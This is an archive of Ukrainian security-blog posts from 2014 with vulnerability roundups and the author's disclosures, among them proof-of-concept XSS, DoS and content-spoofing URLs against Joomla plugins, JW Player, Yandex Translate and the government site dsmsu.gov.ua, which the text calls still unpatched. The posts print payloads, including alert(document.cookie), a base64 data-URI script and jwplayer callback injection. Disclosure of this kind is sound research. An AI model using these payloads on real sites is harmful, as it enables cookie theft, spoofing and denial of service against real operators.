Архів для категорії 'Уразливості'

Добірка уразливостей

17:23 27.02.2014

В даній добірці уразливості в веб додатках:

  • HP ProCurve, H3C, 3COM Routers and Switches, Remote Information Disclosure and Code Execution (деталі)
  • pdirl PHP Directory Listing 1.0.4 - Cross Site Scripting Web Vulnerabilities (деталі)
  • CSRF Horde Groupware Web mail Edition (деталі)
  • XSS and CSRF Horde Groupware Web mail Edition (деталі)
  • DoS vulnerability in libxml2 (деталі)

Уразливості в перекладачі Яндекса

23:56 26.02.2014

У січні, 06.01.2014, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості на сайтах http://translate.yandex.ru, http://translate.yandex.ua та http://translate.yandex.net. Про що найближчим часом сповіщу адміністрацію сайтів. Раніше я вже додав ці сайти в DAVOSET.

Це онлайн перекладач Яндекса на трьох доменах. Даний сервіс може використовуватися для проведення атак на інші сайти. Про подібні уразливості я писав в статті Використання сайтів для атак на інші сайти. Також я писав про переваги даних атак.

XSS (Remote XSS/HTML Include):

Abuse of Functionality:

http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url=http://google.com

http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url=http://google.com

http://translate.yandex.net/tr-url/ru-uk.uk/google.com/

Можна проводити атаки на інші сайти. А також проводити DoS атаки на сервер самого сайта, що описано у моїй статті.

Insufficient Anti-automation:

Із-за відсутності захисту від автоматизованих запитів (капчі) в даному функціоналі, атаки на інші сайти можна автоматизувати. Наприклад, з використанням DAVOSET.

Численні уразливості в Joomla-Base

22:46 22.02.2014

У січні, 01.01.2014, я знайшов численні уразливості в Joomla-Base. Це Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure та Insufficient Anti-automation уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Joomla-Base - це сбірка Joomla. Яка містить різні плагіни, в тому числі Google Maps плагін для Joomla, і тому має всі його уразливості. Що я оприлюднив в 2013-2014 роках.

Всі дірки мають місце в файлі plugin_googlemap2_proxy.php. Ось опис DoS та XSS уразливостей, опис інших дірок в попередніх записах.

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=google.com

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E

Уразливі всі версії пакета Joomla-Base.

Добірка уразливостей

18:07 22.02.2014

В даній добірці уразливості в веб додатках:

  • HP Networking Products including H3C and 3COM Routers and Switches, OSPF Remote Information Disclosure and Denial of Service (деталі)
  • Vulnerability in Roundcube (деталі)
  • GTX CMS 2013 Optima - Multiple Web Vulnerabilities References (деталі)
  • Olat CMS 7.8.0.1 - Persistent Calender Web Vulnerability (деталі)
  • HP ProCurve Switches, Remote Unauthorized Information Disclosure (деталі)

Численні уразливості в JoomLeague для Joomla

23:52 21.02.2014

У січні, 01.01.2014, я знайшов численні уразливості в JoomLeague плагіні для Joomla. Це Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure та Insufficient Anti-automation уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Цей плагін містить Google Maps плагін для Joomla і тому має всі його уразливості. Що я оприлюднив в 2013-2014 роках.

Всі дірки мають місце в файлі plugin_googlemap3_proxy.php. Ось опис DoS уразливості, опис інших дірок в попередніх записах.

Denial of Service (WASC-10):

http://site/components/com_joomleague/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url=google.com

Уразливі плагін JoomLeague 2.1.12 для Joomla та попередні версії. Та пакет joomleague-2-komplettpaket, що містить цей плагін.

Добірка уразливостей

17:26 20.02.2014

В даній добірці уразливості в веб додатках:

  • Multiple vulnerabilities in McAfee ePO 4.6.6 (деталі)
  • Local File Include in Nagios Looking Glass (деталі)
  • vBulletin remote admin injection exploit (деталі)
  • Multiple CSRF Horde Groupware Web mail Edition 5.1.2 (деталі)
  • Re: Multiple vulnerabilities in McAfee ePO 4.6.6 (деталі)

Уразливості в плагінах для WordPress №134

23:51 19.02.2014

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах WordPress Themes, Amplus та Pretty Photo. Для котрих з’явилися експлоіти. WordPress Themes - це теми движка (Bordeaux, Bulteno, Oxygen, Radial, Rayoflight, Reganto і Rockstar), Amplus - це тема движка, Pretty Photo - це плагін для створення фото галереї.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Уразливості в DSMS

23:53 15.02.2014

13.11.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості в DSMS. Які я виявив на dsmsu.gov.ua. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

15.02.2014

XSS (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

XSS (WASC-08):

Якщо на сайті на сторінці з jwplayer.swf (player.swf) є можливість включити (через HTML Injection) JS код з калбек функцією, а таких функцій всього 19, то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
flashplayer: "jwplayer.swf",
file: "1.flv",
autostart: true,
height: 300,
width: 480,
events: {
onReady: function() { alert(document.cookie); },
onComplete: function() { alert(document.cookie); },
onBufferChange: function() { alert(document.cookie); },
onBufferFull: function() { alert(document.cookie); },
onError: function() { alert(document.cookie); },
onFullscreen: function() { alert(document.cookie); },
onMeta: function() { alert(document.cookie); },
onMute: function() { alert(document.cookie); },
onPlaylist: function() { alert(document.cookie); },
onPlaylistItem: function() { alert(document.cookie); },
onResize: function() { alert(document.cookie); },
onBeforePlay: function() { alert(document.cookie); },
onPlay: function() { alert(document.cookie); },
onPause: function() { alert(document.cookie); },
onBuffer: function() { alert(document.cookie); },
onSeek: function() { alert(document.cookie); },
onIdle: function() { alert(document.cookie); },
onTime: function() { alert(document.cookie); },
onVolume: function() { alert(document.cookie); }
}
});
</script>

Content Spoofing (WASC-12):

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg
http://site/templates/default/js/jwplayer/player.swf?config=1.xml
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss
http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

В системі є й інші дірки, про які я повідомив розробникам. Дані уразливості досі не виправлені.

Добірка уразливостей

17:11 15.02.2014

В даній добірці уразливості в веб додатках:

  • Command Injection via CSRF on DD-WRT v24-sp2 (деталі)
  • Blind SQL Injection in Ops View (деталі)
  • Multilple Cross Site Scripting (XSS) Attacks in Ops View (деталі)
  • ILIAS eLearning 4.3.4 & 4.4 CMS - Persistent Notes Web Vulnerability (деталі)
  • Exploit Tool Targets Vulnerabilities in McAfee ePolicy Orchestrator (ePO) (деталі)

Уразливості на dsmsu.gov.ua

17:23 14.02.2014

30.10.2013

У жовтні, 27.10.2013, я знайшов Cross-Site Scripting та Content Spoofing уразливості на сайті Держмолодьспорту - http://dsmsu.gov.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно державних сайтів в останнє я писав про уразливості на nrcu.gov.ua та www.bank.gov.ua.

Детальна інформація про уразливості з’явиться пізніше.

14.02.2014

Уразливості в JW Player я описав в попередні роки.

XSS:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Та інші XSS уразливості в JW Player.

Content Spoofing:

http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://dsmsu.gov.ua/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

Та інші CS уразливості в JW Player.

На сайті є й інші дірки, про які я повідомив адмінам та розробникам движка, що розробляли сайт. Дані уразливості досі не виправлені.